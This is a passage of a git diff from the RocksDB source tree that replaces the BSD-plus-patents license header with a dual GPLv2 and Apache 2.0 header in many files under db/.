-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/filename_test.cc b/db/filename_test.cc
index 330b2e788de..d6bde52834e 100644
--- a/db/filename_test.cc
+++ b/db/filename_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/flush_job.cc b/db/flush_job.cc
index 57a6ca7315e..846edb4074b 100644
--- a/db/flush_job.cc
+++ b/db/flush_job.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/flush_job.h b/db/flush_job.h
index 6a685c09f89..4698ae7b03d 100644
--- a/db/flush_job.h
+++ b/db/flush_job.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/flush_job_test.cc b/db/flush_job_test.cc
index e757b400491..34a3c983c33 100644
--- a/db/flush_job_test.cc
+++ b/db/flush_job_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include
 #include
diff --git a/db/flush_scheduler.cc b/db/flush_scheduler.cc
index eb24efb9cf5..8735a6b369b 100644
--- a/db/flush_scheduler.cc
+++ b/db/flush_scheduler.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "db/flush_scheduler.h"
diff --git a/db/flush_scheduler.h b/db/flush_scheduler.h
index 39d7423bc07..cd3575861a8 100644
--- a/db/flush_scheduler.h
+++ b/db/flush_scheduler.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/db/forward_iterator.cc b/db/forward_iterator.cc
index d496e2b7774..65fff95956d 100644
--- a/db/forward_iterator.cc
+++ b/db/forward_iterator.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #include "db/forward_iterator.h"
diff --git a/db/forward_iterator.h b/db/forward_iterator.h
index 4a212f3533b..d4f32cba9fa 100644
--- a/db/forward_iterator.h
+++ b/db/forward_iterator.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/db/forward_iterator_bench.cc b/db/forward_iterator_bench.cc
index 64d4b0508b6..e9ae770cfaf 100644
--- a/db/forward_iterator_bench.cc
+++ b/db/forward_iterator_bench.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef __STDC_FORMAT_MACROS
 #define __STDC_FORMAT_MACROS
diff --git a/db/internal_stats.cc b/db/internal_stats.cc
index c2a528e831c..54723ea91f6 100644
--- a/db/internal_stats.cc
+++ b/db/internal_stats.cc
@@ -1,8 +1,6 @@
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/internal_stats.h b/db/internal_stats.h
index 5632b39c8b5..1dd393f73ce 100644
--- a/db/internal_stats.h
+++ b/db/internal_stats.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/job_context.h b/db/job_context.h
index f0670efc8d7..950a3a667db 100644
--- a/db/job_context.h
+++ b/db/job_context.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/listener_test.cc b/db/listener_test.cc
index 7ab49d0749d..5b5f2266b31 100644
--- a/db/listener_test.cc
+++ b/db/listener_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "db/db_impl.h"
 #include "db/db_test_util.h"
diff --git a/db/log_format.h b/db/log_format.h
index 4e73dc63fa4..be22201af0a 100644
--- a/db/log_format.h
+++ b/db/log_format.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/log_reader.cc b/db/log_reader.cc
index 3d052ed29f0..cae5d8ea087 100644
--- a/db/log_reader.cc
+++ b/db/log_reader.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/log_reader.h b/db/log_reader.h
index 9a0baaa6400..c6a471cda44 100644
--- a/db/log_reader.h
+++ b/db/log_reader.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/log_test.cc b/db/log_test.cc
index 3ae2b425c6f..651a1d0eeee 100644
--- a/db/log_test.cc
+++ b/db/log_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/log_writer.cc b/db/log_writer.cc
index 36480c403ea..b02eec89dd9 100644
--- a/db/log_writer.cc
+++ b/db/log_writer.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/log_writer.h b/db/log_writer.h
index c6cb122330b..a3a879924e9 100644
--- a/db/log_writer.h
+++ b/db/log_writer.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/malloc_stats.cc b/db/malloc_stats.cc
index dbd2ddb7dfc..7acca65123e 100644
--- a/db/malloc_stats.cc
+++ b/db/malloc_stats.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/malloc_stats.h b/db/malloc_stats.h
index 212d447e293..a2f324ff18d 100644
--- a/db/malloc_stats.h
+++ b/db/malloc_stats.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/managed_iterator.cc b/db/managed_iterator.cc
index 33d5144c9d4..c393eb5a6fd 100644
--- a/db/managed_iterator.cc
+++ b/db/managed_iterator.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/db/managed_iterator.h b/db/managed_iterator.h
index db0438ebf54..8e962f781a2 100644
--- a/db/managed_iterator.h
+++ b/db/managed_iterator.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/db/manual_compaction_test.cc b/db/manual_compaction_test.cc
index 230894ab5e5..039b9080ed3 100644
--- a/db/manual_compaction_test.cc
+++ b/db/manual_compaction_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Test for issue 178: a manual compaction causes deleted data to reappear.
 #include
diff --git a/db/memtable.cc b/db/memtable.cc
index 271b18e4351..efea6199af2 100644
--- a/db/memtable.cc
+++ b/db/memtable.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/memtable.h b/db/memtable.h
index c5a0a8cf6fa..fe9feaf5706 100644
--- a/db/memtable.h
+++ b/db/memtable.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/memtable_list.cc b/db/memtable_list.cc
index 90a619a218b..8f710c2e970 100644
--- a/db/memtable_list.cc
+++ b/db/memtable_list.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #include "db/memtable_list.h"
diff --git a/db/memtable_list.h b/db/memtable_list.h
index bf20ff1f6a9..ed475b83a10 100644
--- a/db/memtable_list.h
+++ b/db/memtable_list.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
diff --git a/db/memtable_list_test.cc b/db/memtable_list_test.cc
index 081d61bffc7..30e51666372 100644
--- a/db/memtable_list_test.cc
+++ b/db/memtable_list_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "db/memtable_list.h"
 #include
diff --git a/db/merge_context.h b/db/merge_context.h
index ec3d7473570..5e75e099731 100644
--- a/db/merge_context.h
+++ b/db/merge_context.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
 #include
diff --git a/db/merge_helper.cc b/db/merge_helper.cc
index a72b0456418..142486e5eb8 100644
--- a/db/merge_helper.cc
+++ b/db/merge_helper.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "db/merge_helper.h"
diff --git a/db/merge_helper.h b/db/merge_helper.h
index 5f3ccd0d1e7..59da47a6b0b 100644
--- a/db/merge_helper.h
+++ b/db/merge_helper.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef MERGE_HELPER_H
 #define MERGE_HELPER_H
diff --git a/db/merge_helper_test.cc b/db/merge_helper_test.cc
index 31d91013034..dc43db0d105 100644
--- a/db/merge_helper_test.cc
+++ b/db/merge_helper_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include
 #include
diff --git a/db/merge_operator.cc b/db/merge_operator.cc
index ebd26beca3e..1981e65ba4e 100644
--- a/db/merge_operator.cc
+++ b/db/merge_operator.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 /**
  * Back-end implementation details specific to the Merge Operator.
diff --git a/db/merge_test.cc b/db/merge_test.cc
index 37185a891da..b6582b7a596 100644
--- a/db/merge_test.cc
+++ b/db/merge_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #include
 #include
diff --git a/db/options_file_test.cc b/db/options_file_test.cc
index 8718f5a1404..fc62840eb47 100644
--- a/db/options_file_test.cc
+++ b/db/options_file_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #include
diff --git a/db/perf_context_test.cc b/db/perf_context_test.cc
index c49f9e11931..d06843a8303 100644
--- a/db/perf_context_test.cc
+++ b/db/perf_context_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #include
 #include
diff --git a/db/pinned_iterators_manager.h b/db/pinned_iterators_manager.h
index 6350b6014e1..7874eef6d77 100644
--- a/db/pinned_iterators_manager.h
+++ b/db/pinned_iterators_manager.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
 #include
diff --git a/db/plain_table_db_test.cc b/db/plain_table_db_test.cc
index 8fa59d40bcc..9ce50f28f69 100644
--- a/db/plain_table_db_test.cc
+++ b/db/plain_table_db_test.cc
@@ -1,11 +1,9 @@
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/prefix_test.cc b/db/prefix_test.cc
index 0b5fa87c4cc..a4ed201dad1 100644
--- a/db/prefix_test.cc
+++ b/db/prefix_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/db/range_del_aggregator.cc b/db/range_del_aggregator.cc
index 70ec35e79d7..0aa5d22cbcb 100644
--- a/db/range_del_aggregator.cc
+++ b/db/range_del_aggregator.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2016-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "db/range_del_aggregator.h"
diff --git a/db/range_del_aggregator.h b/db/range_del_aggregator.h
index bfa69fdc564..9d4b8ca1683 100644
--- a/db/range_del_aggregator.h
+++ b/db/range_del_aggregator.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2016-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/db/range_del_aggregator_test.cc b/db/range_del_aggregator_test.cc
index 2de049d5b8e..39029bd2a2e 100644
--- a/db/range_del_aggregator_test.cc
+++ b/db/range_del_aggregator_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2016-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
